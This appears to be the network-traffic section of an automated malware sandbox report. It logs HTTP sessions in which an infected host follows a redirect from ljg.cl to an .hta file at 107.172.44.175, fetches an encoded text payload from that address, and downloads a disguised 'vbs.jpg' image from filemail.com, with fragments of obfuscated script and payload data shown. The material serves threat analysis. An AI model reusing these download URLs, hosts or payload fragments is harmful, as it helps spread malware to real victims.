Nov 26, 2024 15:49:16.288494110 CET	1236	IN	Data Raw: 00 75 00 4c 00 41 00 69 00 64 00 57 00 53 00 63 00 51 00 4f 00 22 00 0d 00 0a 00 4c 00 76 00 49 00 75 00 47 00 4b 00 4b 00 4c 00 78 00 6e 00 69 00 69 00 6e 00 5a 00 4c 00 20 00 3d 00 20 00 22 00 4f 00 4c 00 63 00 55 00 4b 00 6f 00 7a 00 5a 00 65 Data Ascii: uLAidWScQO"LvIuGKKLxniinZL = "OLcUKozZexLGiUi"iKKppcHmNmoAiKl = "WWeUedQPkpiLILU"UzLpWWoLxZZWxxN = "kpaxLLcoiLUKkLB
Nov 26, 2024 15:49:16.406301022 CET	1236	IN	Data Raw: 00 0d 00 0a 00 75 00 4e 00 76 00 74 00 55 00 57 00 4b 00 6f 00 63 00 73 00 6f 00 63 00 4b 00 69 00 47 00 20 00 3d 00 20 00 22 00 55 00 6c 00 68 00 43 00 5a 00 61 00 53 00 62 00 62 00 69 00 6e 00 4c 00 47 00 68 00 73 00 22 00 0d 00 0a 00 41 00 57 Data Ascii: uNvtUWKocsocKiG = "UlhCZaSbbinLGhs"AWShaGJkLNWNCUW = "tpzGOeCaGJebpLC"prLmozRdLGzLLKP = "NWqhkuUUPniLWro"CLuLmjbZ

Timestamp	Bytes transferred	Direction	Data
Nov 26, 2024 15:49:40.982269049 CET	78	OUT	GET /1321/CAMRM.txt HTTP/1.1 Host: 107.172.44.175 Connection: Keep-Alive
Nov 26, 2024 15:49:42.186249971 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 26 Nov 2024 14:49:41 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Last-Modified: Tue, 26 Nov 2024 08:08:44 GMT ETag: "1eaac-627cc5b9be702" Accept-Ranges: bytes Content-Length: 125612 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain Data Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 2b 6b 48 62 69 31 57 5a 7a 4e 58 59 76 77 6a 43 4e 34 7a 62 6d 35 57 53 30 4e 58 64 79 52 33 4c 38 41 43 49 4b 30 67 50 35 52 58 61 79 56 33 59 6c 4e 33 4c 38 41 43 49 67 41 69 43 4e 34 7a 63 6c 64 57 5a 73 6c 6d 64 70 4a 48 55 6b 56 47 64 7a 56 57 64 78 56 6d 63 76 77 44 49 67 41 43 49 67 41 69 43 4e 34 7a 4c 69 55 32 63 73 46 6d 5a 69 30 7a 63 7a 56 32 59 6a 46 55 61 31 42 69 49 79 56 32 61 76 5a 6e 62 4a 4e 58 59 69 30 44 62 6c 5a 58 5a 73 42 43 62 6c 5a 58 5a 4d 35 32 62 70 52 58 64 6a 56 47 65 46 52 57 5a 30 4e 58 5a 31 46 58 5a 79 78 44 49 67 41 43 49 67 41 43 49 67 6f 51 44 2b 49 79 4d 32 35 53 62 7a 46 6d 4f 74 39 32 59 74 51 6e 5a 76 4e 33 62 79 4e 57 61 74 31 79 63 68 31 57 5a 6f 4e 32 63 36 34 [TRUNCATED] Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+kHbi1WZzNXYvwjCN4zbm5WS0NXdyR3L8ACIK0gP5RXayV3YlN3L8ACIgAiCN4zcldWZslmdpJHUkVGdzVWdxVmcvwDIgACIgAiCN4zLiU2csFmZi0zczV2YjFUa1BiIyV2avZnbJNXYi0DblZXZsBCblZXZM52bpRXdjVGeFRWZ0NXZ1FXZyxDIgACIgACIgoQD+IyM25SbzFmOt92YtQnZvN3byNWat1ych1WZoN2c64mc1JSPz5GbthHIzV2ZlxWa2lmcQRWZ0NXZ1FXZyxDIgACIgAiCN4Te0lmc1NWZzxDIgACIK0gPiIjdu02chpTbvNWL0Z2bz9mcjlWbtMXYtVGajNnOuJXdi0zcuxWb4Bybm5WS0NXdyRHPgAiCN4zLiAHch5ibvlGdhNWasBHcBlXTi0TZtFmbgICMuAjLw4SMi0jbvl2cyVmdgkHdpRnblRWS5xmYtV2czFGPgAiCN4jIw4SMi0jbvl2cyVmV0NXZmlmbh1GIiEjdu02chpTbvNWL0Z2bz9mcjlWbtMXYtVGajNnOuJXdi0zcuxWb4BSesJWblN3chxjCNoQD+8jIzVWei0TZu9GbhRmbhR3cgICOtYEVVJSPn5Wak92YuVGIiAjLxISPu9WazJXZ2BCbth3P887uvDAAAADAuAAMA4CAwAgLAEDAAAgbA8GApBwcAIHAlBgVAACA5BAbAIGAtBQZAMHAzBQQAEAAIAAOAAAAwAgLAADAuAAMA4CAxAAAA4GAvBQaAMHAyBQZAYFA0BwYAUHAkBwbAIHAQBQAAgAA0AAAAAAAoBAWA0EACBQaAYGAZ
Nov 26, 2024 15:49:42.186388969 CET	1236	IN	Data Raw: 42 67 51 41 45 45 41 52 42 41 41 41 41 41 41 6c 42 51 62 41 45 47 41 4f 42 41 64 41 4d 47 41 31 42 41 5a 41 38 47 41 79 42 41 55 41 45 41 41 4c 41 67 4e 41 41 41 41 41 41 51 5a 41 67 48 41 6c 42 67 4c 41 67 47 41 59 42 51 54 41 49 45 41 70 42 67 Data Ascii: BgQAEEARBAAAAAAlBQbAEGAOBAdAMGA1BAZA8GAyBAUAEAALAgNAAAAAAQZAgHAlBgLAgGAYBQTAIEApBgZAkFACBQQAEFAAAQZA0GAhBgbAUGAsBQaAYEAsBQYA4GApBwZAkGAyBwTAEAAPAgRAAAAAAAAAAAAzBwaAIHAhBQbAUGAkBQYAIHAUBAbAEGAnBQZAwEABAQAAoCAAAANAIDAwAgMAACAgAQqAACA0BAaAcGApBgc
Nov 26, 2024 15:49:42.186402082 CET	1236	IN	Data Raw: 49 78 42 55 41 4a 67 53 45 67 43 46 6f 51 41 48 4d 51 47 53 67 52 41 43 4b 68 41 41 67 41 43 49 67 41 41 65 51 77 42 48 67 52 41 31 49 59 45 56 59 41 47 42 45 6d 45 56 55 41 68 41 4b 52 41 4b 55 67 44 41 34 52 41 42 41 6a 42 4f 34 67 44 64 49 41 Data Ascii: IxBUAJgSEgCFoQAHMQGSgRACKhAAgACIgAAeQwBHgRA1IYEVYAGBEmEVUAhAKRAKUgDA4RABAjBO4gDdIAAGERgSIAGYEQNCGRFC4gDO4AiAKBCICoEd0rgS4QjBKBhAKhACIgAO0hDI4QHC4gDdIgAO4wHHYTNOZTrWhzvxgACdEQAAUgAK4AEIEABAgACOEAAEggCBAABIkrgRUrgRErgR4ACBYAAPIgDCgACIYwBIIACIggD
Nov 26, 2024 15:49:42.187165976 CET	1236	IN	Data Raw: 4b 42 48 70 47 6f 45 46 30 52 61 43 4b 68 41 46 30 68 41 46 30 68 44 46 30 78 44 48 30 68 41 43 49 77 42 45 30 51 44 42 41 41 42 49 34 41 43 43 41 51 42 44 49 67 41 49 67 41 43 49 49 41 43 64 67 41 43 43 67 51 48 49 30 42 43 64 67 51 48 49 67 67 Data Ascii: KBHpGoEF0RaCKhAF0hAF0hDF0xDH0hACIwBE0QDBAABI4ACCAQBDIgAIgACIIACdgACCgQHI0BCdgQHIggAIgQHI0hDOgxBhgACF0BCDAyBhJYEOEgAgcgDO0RAAUACOEAIE4ACBACBOUlgS0RAAcQEBKhAOIgAOIgDCggACIgDCIACCIgDD4gACgACCggAOIQBdgQXCKhDOklgS4ACO0hACwhACERgSUlgSgQVCKRH5IoEOUlg
Nov 26, 2024 15:49:42.187177896 CET	1236	IN	Data Raw: 30 62 67 53 6b 62 67 53 55 62 67 53 49 51 45 42 4b 52 69 42 4b 52 42 64 45 62 67 53 49 77 44 48 4d 43 48 41 41 79 41 70 47 6f 45 41 41 53 42 4f 55 61 67 53 45 41 49 47 45 52 67 53 49 51 72 42 4b 52 71 42 4b 68 44 6c 47 6f 45 4f 45 61 67 53 77 52 Data Ascii: 0bgSkbgSUbgSIQEBKRiBKRBdEbgSIwDHMCHAAyApGoEAASBOUagSEAIGERgSIQrBKRqBKhDlGoEOEagSwRCHUhDO4gAgUQiBKRABAiBOkYgSEAIGUYgSEQAgYQnBKRABAiBZGoEAAQBFGoEAAQBNGoEREoEOkYgSUYgS4QRBKhDIcAFJFYEOEAAG4AHCcABIgQBdUQHDACChFoEAASB5FYEBEAIGUQHBEAIFgACtFoEI0WgSEQB
Nov 26, 2024 15:49:42.187839985 CET	1236	IN	Data Raw: 42 46 64 75 56 57 61 73 4e 45 63 30 52 48 53 77 46 32 62 54 35 79 63 73 39 32 59 76 52 33 62 79 42 6c 4c 7a 56 32 59 70 5a 6e 63 6c 4e 6c 4c 69 56 32 56 75 30 57 5a 30 4e 58 65 54 52 44 41 42 45 47 41 41 4d 58 62 79 39 6d 52 75 51 33 59 6c 70 32 Data Ascii: BFduVWasNEc0RHSwF2bT5ycs92YvR3byBlLzV2YpZnclNlLiV2Vu0WZ0NXeTRDABEGAAMXby9mRuQ3Ylp2byBVeN5SeNJxXfV2YuFGdz5WSf9VZz9GczlGRT81XlNmbhR3cul0XfVGdhVmcDJRby9mRuMXby9mRuM3dvRmbpdlLtVGdzl3UZAQAY5gDO4QAEAyBAAwclNWa2JXZTJWZX5SeN5AABMBAAMXby9mRukXTIAQANAAA
Nov 26, 2024 15:49:42.187850952 CET	1236	IN	Data Raw: 67 42 43 42 41 43 42 46 30 52 42 64 55 51 48 46 30 52 42 64 55 51 48 46 41 69 44 4f 45 51 41 67 51 51 42 64 55 51 48 46 30 52 41 44 41 53 43 4b 59 67 41 49 34 51 41 43 41 53 42 49 67 41 45 49 55 51 48 49 55 51 48 4d 46 42 45 49 55 51 48 59 6b 67 Data Ascii: gBCBACBF0RBdUQHF0RBdUQHFAiDOEQAgQQBdUQHF0RADASCKYgAI4QACASBIgAEIUQHIUQHMFBEIUQHYkgCAMRCIABCF0BCF0BTRABCF0BGJoAATgRCBAABJgQBdgAGYAhDYgRCJAgDIgQBd4AGJUAAJkACQgQBd4AGJYAALkAGJIAAFkgDOgBEJQAAIggBCUQHGMAAAAABEAAAAgABAAAAAQQCGIQWRUlERJBHCQAIK0kEGMQS
Nov 26, 2024 15:49:42.188855886 CET	1236	IN	Data Raw: 41 41 58 41 51 47 41 79 42 51 61 41 49 47 41 79 42 51 5a 41 51 47 41 75 42 51 64 41 67 47 41 55 42 41 49 41 45 47 41 73 42 41 62 41 6b 47 41 36 42 77 62 41 30 45 41 63 74 43 41 41 4d 46 41 46 42 41 54 41 6b 45 41 47 42 51 54 41 45 45 41 53 42 77 Data Ascii: AAXAQGAyBQaAIGAyBQZAQGAuBQdAgGAUBAIAEGAsBAbAkGA6BwbA0EActCAAMFAFBATAkEAGBQTAEEASBwRA8EASBAUZAAAuBwdA8GAkBAdAUHAoBwUA8FATBwUA4UGAAAIAoAANAQPA0DA9AQPA0DA9AQPA0DA9AQPA0DA9AQPA0DA9AQPA0DA9AQPA0DA9AQPA0DA9AQPAoAANAgbA8GAnBQYAIHAEBAIAUGAjBQSAACA6Agb
Nov 26, 2024 15:49:42.188868999 CET	1236	IN	Data Raw: 30 44 41 59 42 51 50 41 30 44 41 39 41 51 50 41 30 44 41 39 41 51 50 41 30 44 41 39 41 51 50 41 30 44 41 39 41 67 43 41 30 77 62 42 41 51 4c 44 41 41 41 35 41 41 4f 41 63 44 41 32 41 41 4e 41 4d 44 41 79 41 51 57 41 67 46 41 58 42 67 56 41 51 46 Data Ascii: 0DAYBQPA0DA9AQPA0DA9AQPA0DA9AQPA0DA9AgCA0wbBAQLDAAA5AAOAcDA2AANAMDAyAQWAgFAXBgVAQFASBQUAAFANBwSAoEAIBwRAYEAEBwQAIUMAAARAkEA0BwYAUHAkBwbAIHAQBAbAEGA0BQaAcGApBARhAAAuBwbAkGAzBgcAUGAWBAdA4GAlBgcAIHA1BwQAwFAUBgTAACAzBwdA8GAkBgbAkGAXBAXAQHAmBwbAMHA
Nov 26, 2024 15:49:42.189538956 CET	1236	IN	Data Raw: 55 48 41 79 42 41 62 56 41 41 41 6c 42 51 64 41 77 47 41 68 42 67 56 41 51 48 41 6c 42 77 52 52 41 41 41 30 42 67 62 41 55 48 41 76 42 77 51 41 63 48 41 76 42 67 55 41 51 48 41 6c 42 77 52 58 41 41 41 73 42 77 62 41 63 47 41 70 42 67 62 41 4d 58 Data Ascii: UHAyBAbVAAAlBQdAwGAhBgVAQHAlBwRRAAA0BgbAUHAvBwQAcHAvBgUAQHAlBwRXAAAsBwbAcGApBgbAMXDAAQZAwGAiBQYAQFAkBQYAUGASNBAAwFAPBAcAUGAyBQYAwFAPBAcAUGAyBQYAwFAwBgcA8GAmBQaAwGAlBAXAcHAhBgbAQGAuAAZAEGA0tDAAwFAPBAcAUGAyBQYAACATBwbAYGA0BwdAEGAyBQZAwFAPBAcAUGA
Nov 26, 2024 15:49:42.307688951 CET	1236	IN	Data Raw: 42 41 49 41 49 48 41 6c 42 77 63 41 55 46 41 63 42 77 62 41 63 47 41 70 42 51 62 41 45 45 41 63 64 45 41 41 41 43 41 4b 41 51 44 41 30 44 41 39 41 51 50 41 30 44 41 39 41 51 50 41 30 44 41 39 41 51 50 41 30 44 41 39 41 51 50 41 30 44 41 39 41 51 Data Ascii: BAIAIHAlBwcAUFAcBwbAcGApBQbAEEAcdEAAACAKAQDA0DA9AQPA0DA9AQPA0DA9AQPA0DA9AQPA0DA9AQPA0DA9AQPA0DA9AQPA0DA9AQPA0DAKAQDAUGAtBwbAIHAoBwYAkGAOBAIAoDAuBwbAkGA0BQYAMGApBAbAAHAwBQQAoAANsGAAEGA0BQYAQEAgAgbAkGAnBwbAwEAcBAdAwGA1BQYAYGAlBARAwFAhBAdAEGAEBAI

Timestamp	Bytes transferred	Direction	Data
2024-11-26 14:49:00 UTC	406	OUT	GET /wfUP?&action=historical&rubber=shrill&gallon=cloudy&pocketbook=inexpensive&jumpsuit=nice&heel HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: ljg.cl Connection: Keep-Alive
2024-11-26 14:49:00 UTC	594	IN	HTTP/1.1 302 Found Server: openresty Date: Tue, 26 Nov 2024 14:49:00 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 134 Connection: close X-DNS-Prefetch-Control: off X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=15552000; includeSubDomains X-Download-Options: noopen X-Content-Type-Options: nosniff X-XSS-Protection: 0 Location: http://107.172.44.175/1321/nu/seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentiretimeforall.hta Vary: Accept Strict-Transport-Security: max-age=63072000;includeSubDomains; preload X-Served-By: ljg.cl
2024-11-26 14:49:00 UTC	134	IN	Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 30 37 2e 31 37 32 2e 34 34 2e 31 37 35 2f 31 33 32 31 2f 6e 75 2f 73 65 65 74 68 65 62 65 73 74 74 68 69 67 6e 73 77 69 74 68 67 72 65 61 74 61 74 74 69 74 75 64 65 77 68 69 63 68 67 69 76 65 6e 75 62 65 73 74 74 68 69 6e 67 73 62 61 63 6b 77 69 74 68 65 6e 74 69 72 65 74 69 6d 65 66 6f 72 61 6c 6c 2e 68 74 61 Data Ascii: Found. Redirecting to http://107.172.44.175/1321/nu/seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentiretimeforall.hta

Timestamp	Bytes transferred	Direction	Data
2024-11-26 14:49:05 UTC	430	OUT	GET /wfUP?&action=historical&rubber=shrill&gallon=cloudy&pocketbook=inexpensive&jumpsuit=nice&heel HTTP/1.1 Accept: / Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: ljg.cl Connection: Keep-Alive
2024-11-26 14:49:05 UTC	594	IN	HTTP/1.1 302 Found Server: openresty Date: Tue, 26 Nov 2024 14:49:05 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 134 Connection: close X-DNS-Prefetch-Control: off X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=15552000; includeSubDomains X-Download-Options: noopen X-Content-Type-Options: nosniff X-XSS-Protection: 0 Location: http://107.172.44.175/1321/nu/seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentiretimeforall.hta Vary: Accept Strict-Transport-Security: max-age=63072000;includeSubDomains; preload X-Served-By: ljg.cl
2024-11-26 14:49:05 UTC	134	IN	Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 30 37 2e 31 37 32 2e 34 34 2e 31 37 35 2f 31 33 32 31 2f 6e 75 2f 73 65 65 74 68 65 62 65 73 74 74 68 69 67 6e 73 77 69 74 68 67 72 65 61 74 61 74 74 69 74 75 64 65 77 68 69 63 68 67 69 76 65 6e 75 62 65 73 74 74 68 69 6e 67 73 62 61 63 6b 77 69 74 68 65 6e 74 69 72 65 74 69 6d 65 66 6f 72 61 6c 6c 2e 68 74 61 Data Ascii: Found. Redirecting to http://107.172.44.175/1321/nu/seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentiretimeforall.hta

Timestamp	Bytes transferred	Direction	Data
2024-11-26 14:49:25 UTC	211	OUT	GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1 Host: 3105.filemail.com Connection: Keep-Alive
2024-11-26 14:49:25 UTC	328	IN	HTTP/1.1 200 OK Content-Length: 2230233 Content-Type: image/jpeg Last-Modified: Mon, 25 Nov 2024 10:41:01 GMT Accept-Ranges: bytes ETag: 67ad55be8fbd7389b2f5ef2b123a44b4 X-Transfer-ID: ibybhsntnwgamsn Content-Disposition: attachment; filename=new_imagem-vbs.jpg Date: Tue, 26 Nov 2024 14:49:24 GMT Connection: close
2024-11-26 14:49:25 UTC	2661	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-11-26 14:49:25 UTC	8192	IN	Data Raw: b0 30 fe df f8 62 78 7f 89 78 5a 78 7c 7b 65 96 c2 ed ad cc e1 96 8d fb f2 31 ef b0 9f 66 e5 56 3e 29 ad 2e b3 ee 23 6b 5d 91 ef 8f 7d b6 3b 7e d3 fd 99 2c a0 de a4 02 48 e8 3c c8 b9 fd 2b 3d bb ec 8d 18 91 c0 14 68 7f 2c 07 62 d7 b9 50 09 0c 17 b8 3d 46 5b ef 85 1c b2 38 dc d5 6b 7c 8c cd 80 06 22 88 00 fb 74 c5 c6 89 f4 fe 2d 26 ab ef 2f e5 b0 1e 8a 15 d3 03 7b ef a3 82 6d 4f 7c 20 f1 02 0b 6d 76 25 85 73 99 62 5f 34 d8 1c 7b e1 83 10 a3 8a b3 d7 01 8d 66 a0 49 0c 6a 5b 68 dc c7 75 e1 74 7a 92 cc 1f 71 de be 96 e6 f7 0f 7c c8 f1 3d 3b 6a 61 8e 38 e5 68 88 53 ea 51 cd e4 69 8b 69 b6 02 ec e5 68 59 ea 78 eb 81 ea 25 9c b2 90 2b 69 19 91 39 68 a6 8e 4d 96 a1 83 30 63 c6 30 9a 85 d8 ac 59 55 5b 81 67 92 71 2f 14 95 e6 85 a2 86 89 65 2a 6b b5 e0 6a 45 e2 ed Data Ascii: 0bxxZx\|{e1fV>).#k]};~,H<+=h,bP=F[8k\|"t-&/{mO\| mv%sb_4{fIj[hutzq\|=;ja8hSQiihYx%+i9hM0c0YU[gq/e*kjE
2024-11-26 14:49:25 UTC	8192	IN	Data Raw: 7c f7 39 63 ab 54 8e 35 8e 05 5e 79 38 19 51 46 9a 92 f1 3a 95 65 50 2c 71 cd f2 79 c1 6a 22 68 11 63 0d 61 01 5d c0 f3 d7 34 a4 68 e7 76 21 29 82 51 23 bf 3d 71 72 10 25 94 e5 4e db 27 ae 06 49 82 47 8c ca 5b 75 7b 0e 41 c2 e8 d6 4d 42 3c 21 a8 8e 6c 9a fa 73 8d e8 b4 52 3e aa 43 11 21 36 12 79 b1 78 d3 e9 a3 8a 24 da a1 58 b6 e2 c7 8b 15 fd eb 00 6a 87 4f 11 0c bc 7e 10 6b 9f 9e 20 ec ab 21 3c 05 3d 6f 34 e6 73 24 2c e4 92 ab db fb 66 59 0c ec 14 0f c4 7a 11 81 0f 13 2c 81 ca 90 80 8e 71 e5 2a 74 e1 e3 2a 55 78 17 d8 df cf 2b 2c 4e 80 47 2a b5 05 dd 83 d3 29 55 65 55 65 1b 88 c0 d0 66 49 22 dc ae c1 81 be 17 8e 98 b8 77 8c 15 90 2d 6e ea 32 88 5e 32 40 1b ab 2a 25 32 69 64 0c c3 75 1f cc 74 c0 b4 00 44 43 48 3d 24 9e be d9 57 87 73 82 09 b3 d6 b1 53 aa Data Ascii: \|9cT5^y8QF:eP,qyj"hca]4hv!)Q#=qr%N'IG[u{AMB<!lsR>C!6yx$XjO~k !<=o4s$,fYz,qtUx+,NG)UeUefI"w-n2^2@%2idutDCH=$WsS
2024-11-26 14:49:25 UTC	8192	IN	Data Raw: ab 12 0f 4e 33 cd 78 76 ad e7 f1 18 5e 54 6b 24 ae e3 d3 a1 eb 9e 8b 50 ae 63 6f 2c da b2 95 e7 b6 00 60 9d f5 b0 4f 1a 3f 97 21 6a 46 6e e3 3c b6 a3 57 ad d1 6b 0c 33 3b 20 56 ea 7a 37 39 bd a0 d1 cb a6 12 1d e5 94 35 ad 9e 98 97 8e 46 d3 e8 d8 be d2 ea f4 19 ba 8c 0c 2f 17 97 ef 1e 27 24 80 d9 60 bc 8f 7d a0 7f 43 83 80 c2 75 71 19 14 85 f3 63 b5 3f e1 1f 8b 05 1c 8f a3 d4 ab ed 05 94 82 03 74 e9 c7 e8 70 f2 cd 16 a7 5a 65 2a 17 74 8a 6b b0 1d fb fb e0 7a 1f b4 10 40 82 08 b4 cc 3c 94 8a 67 ab be 42 80 3f 9e 6b e8 1a 11 e1 5a 15 24 16 30 21 20 7f ba 33 c6 6b 34 eb a7 90 36 9e 63 22 b2 b0 03 b0 5a e7 9e 9e ff 00 96 7a 1f 0b d6 14 f0 b8 09 82 d9 54 2a 9a ea 28 60 6b 96 8e 36 f3 18 0d a0 d6 18 79 6e a0 95 e0 f4 23 32 c4 87 56 a6 3a a2 79 2b d0 8c 6a 13 2a Data Ascii: N3xv^Tk$Pco,`O?!jFn<Wk3; Vz795F/'$`}Cuqc?tpZetkz@<gB?kZ$0! 3k46c"ZzT(`k6yn#2V:y+j*
2024-11-26 14:49:25 UTC	8192	IN	Data Raw: 62 88 3f d7 00 2f 0a c0 4a f9 85 9c a9 53 c7 e1 3d 70 02 0d ac 40 e7 a7 27 db 2d 2f 96 aa c1 0b 07 56 3b ac f0 d7 9c ec cc 1c 79 85 8a d1 f6 b1 58 01 54 69 5c db 50 b3 c9 3d 32 bb 0e e0 07 3c d6 50 80 00 e6 ec 5e 12 30 80 8d cc 41 f6 18 04 11 9b db 77 87 8d 12 32 77 28 dc 3d f3 83 aa 21 21 03 00 38 6c 55 6e 76 b7 63 c6 06 80 9b 7b 04 15 43 b9 39 c6 42 a0 a9 01 81 e9 66 eb 33 a5 4f 2d e8 58 f8 e4 b8 06 24 e0 ee ef ce 06 8f 2c 9d 16 bd f2 84 85 42 a3 6d 9e b8 81 86 40 a0 ed 34 7b de 0e a8 f7 bc 07 80 65 23 90 45 70 0e 11 5c 1b 24 a7 3d 47 b6 26 64 64 41 c7 3f 1c 1a a9 72 4d d6 01 67 27 79 3c 00 3a 56 01 89 6e a7 38 93 c8 eb 9c 4e 07 2d 82 48 1d 32 db 99 ba 91 7d b2 36 d2 d8 3c e5 7b f3 81 72 18 02 4d 50 f8 e5 4f 39 07 a9 ac 8a c0 b8 52 5a 85 5f c4 e1 00 78 Data Ascii: b?/JS=p@'-/V;yXTi\P=2<P^0Aw2w(=!!8lUnvc{C9Bf3O-X$,Bm@4{e#Ep\$=G&ddA?rMg'y<:Vn8N-H2}6<{rMPO9RZ_x
2024-11-26 14:49:25 UTC	8192	IN	Data Raw: d7 d8 ed 6b ff 00 cd 99 5a 9d 42 ce ed 23 46 aa 5b f1 6d ba 27 df 92 70 61 2a 2b dd 67 b6 0a 6b 11 30 3d eb f9 e0 54 4e 88 0d 7a 89 ca c7 3b 33 ed 23 86 e3 07 14 5e 63 10 4d 57 be 11 f4 bb 3a ba ee 3d 00 c0 d3 84 8d 62 a6 8e 46 55 97 a4 32 1e ab fe 56 f8 1e df 1a c4 25 32 46 de 53 f2 63 24 1f 81 07 90 30 cb 0e c8 02 96 b2 dc df b6 39 e2 a8 67 4d 3e b4 70 66 8c 07 0d d4 b2 f0 c7 f9 60 66 97 79 58 09 1c 6d 5e a3 bd 67 d2 3f 64 fa ad 4e 8f c6 3c 5a 6f 0f 81 26 d5 ae 89 76 2b 92 14 a9 96 20 d6 47 b0 24 fd 33 e6 e1 1c 0e 97 f0 cf 65 fb 3e 32 47 37 8d bc 48 4c 8b e1 ea 54 02 07 ff 00 b4 43 ef 80 df 85 06 1f b4 ef 14 31 85 65 bf 12 21 41 2c 08 f2 a6 a1 67 17 fb 7a 61 4d 47 82 94 85 d2 56 f0 7d 1b 02 64 3b 4a 84 65 aa 22 ec 80 bd 0f e7 d7 34 b4 48 cd fb 5f f1 84 Data Ascii: kZB#F[m'pa*+gk0=TNz;3#^cMW:=bFU2V%2FSc$09gM>pf`fyXm^g?dN<Zo&v+ G$3e>2G7HLTC1e!A,gzaMGV}d;Je"4H_
2024-11-26 14:49:26 UTC	8192	IN	Data Raw: 42 8e db c8 68 98 aa 9f e2 00 2d 9f 51 25 8f c6 f3 7e 2f b6 0f 24 71 a0 d5 f8 63 11 d4 04 99 5a ab 8a f4 9e 87 01 6f b4 be 11 e1 5e 09 e1 32 c9 b1 a6 92 40 a8 8a ee 78 20 75 e2 bd f0 bf 65 3e cd 45 0e 88 6a b5 9a 74 92 49 79 02 54 0d 43 e1 77 98 9f 68 bc 62 2f 18 f1 5d 34 46 48 3c b5 23 71 0d 21 5b f7 36 a0 f5 f6 19 bb 0f da 6d 4e 97 4e b1 8d 67 86 34 68 28 83 1c d7 43 b7 e1 c0 db d4 f8 32 aa 7f d9 a4 97 4d 10 21 8c 7a 7d b1 ee 20 df 50 b7 cd 76 39 9f a8 fb 3b a3 d4 3c 6b 36 a7 c4 26 91 97 61 2d 2a b7 96 28 9e 4b 2d f7 02 87 be 23 ff 00 c6 cf 28 0c ba df 0f 56 8c 33 6d 10 ca 37 70 69 4d ad fe 47 3c ff 00 87 f8 d6 a3 5f f6 87 ef b2 be 99 1d 15 99 04 81 fc b5 27 83 b4 2f 36 45 f5 c0 f5 9e 29 e0 11 ea 3c 2f 4d 2e 97 4f 2c d2 41 12 a4 71 82 22 66 5f 48 a6 2c Data Ascii: Bh-Q%~/$qcZo^2@x ue>EjtIyTCwhb/]4FH<#q![6mNNg4h(C2M!z} Pv9;<k6&a-*(K-#(V3m7piMG<_'/6E)</M.O,Aq"f_H,
